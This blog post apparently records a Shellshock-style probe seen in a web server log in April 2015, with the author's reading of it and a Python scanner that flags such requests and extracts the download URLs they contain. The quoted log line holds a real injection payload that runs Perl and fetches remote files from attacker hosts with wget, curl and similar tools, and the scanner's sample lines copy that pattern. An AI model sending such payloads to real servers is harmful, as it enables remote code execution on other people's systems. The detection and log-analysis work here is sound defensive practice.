Saturday, 25 April 2015

Perl script injection again

The same style of request as reported a few days ago hit the system again last night:

 186.56.42.11 - - [25/Apr/2015:09:11:48 +0200] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 404 477 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http//luxsocks.ru ; wget https://luxsocks.ru --no-check-certificate ; curl http//luxsocks.ru// ; curl -k https://luxsocks.ru ; lwp-download http://luxsocks.ru ; GET http://luxsocks.ru ; lynx http://luxsocks.ru ; wget http://174.122.42.230/luxx ; curl http://174.122.42.230/luxx ; fetch http://174.122.42.230/luxx ; lwp-download http://174.122.42.230/luxx ; GET http://174.122.42.230/luxx ; lynx http://174.122.42.230/luxx\");'"
Judging by the commands above (wget https://luxsocks.ru --no-check-certificate), it seems the idea behind this attack was to download and replace the index.html page. So just for the record: if there is already an index.html page in the download directory, wget will simply put an index.html.1 file next to it. If you only have an index.php, this attack might work, but that seems odd.

The system was again hit 30 times within a short time range. So even if it had worked, it would have resulted in 30 index.html files.
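As an added example (not the author's code), a small Python scanner for Apache combined-format logs that picks out requests of the kind quoted above: it flags the `() {` function-definition marker in the User-Agent, counts hits per source address, records the response status, and collects the download URLs named in the payload, repairing the malformed `http//` form seen in the captured request. The sample log lines are constructed, with placeholder addresses and host names.

```python
import re
from collections import Counter

# Apache "combined" log format. The User-Agent is the last quoted field and may
# contain escaped quotes (\"), so it is matched greedily up to the final quote.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>.*)"$'
)
# Shellshock marker: a bash function definition injected into a header that a
# CGI handler exports as an environment variable.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')
# Download URLs in the payload, including the "http//host" form with the colon missing.
URL_RE = re.compile(r'https?:?//[^\s"\\;]+')


def parse_line(line):
    """Return the fields of one combined-format log line, or None if it does not parse."""
    m = LOG_RE.match(line.rstrip("\n"))
    return m.groupdict() if m else None


def normalize_url(url):
    """Repair the 'http//host' typo so the URL can be compared against feed data."""
    return re.sub(r'^(https?)//', r'\1://', url)


def analyze(lines):
    """Count Shellshock-style requests per source IP, by response status, and collect fetched URLs."""
    hits, statuses, urls = Counter(), Counter(), set()
    for line in lines:
        rec = parse_line(line)
        if rec is None or not SHELLSHOCK_RE.search(rec["agent"]):
            continue
        hits[rec["ip"]] += 1
        statuses[rec["status"]] += 1
        urls.update(normalize_url(u) for u in URL_RE.findall(rec["agent"]))
    return {"hits": hits, "statuses": statuses, "urls": sorted(urls)}


# Constructed sample lines (placeholder addresses and hosts), shaped like the captured request.
SAMPLE_LOG = [
    r'''203.0.113.7 - - [25/Apr/2015:09:11:48 +0200] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 404 477 "-" "() { :;};/usr/bin/perl -e 'system(\"wget http//dl.example.invalid ; curl -k https://dl.example.invalid\");'"''',
    r'''198.51.100.9 - - [25/Apr/2015:09:12:01 +0200] "GET /index.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"''',
    r'''203.0.113.7 - - [25/Apr/2015:09:12:30 +0200] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 404 477 "-" "() { :;};/usr/bin/perl -e 'system(\"curl http://203.0.113.200/stage ; lwp-download http://203.0.113.200/stage\");'"''',
]

if __name__ == "__main__":
    print(analyze(SAMPLE_LOG))
```

The 404 count is worth keeping: it shows the targeted CGI script was not present, which is the difference between a noisy probe and a compromised host.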

When testing the link against VirusTotal, there was no result.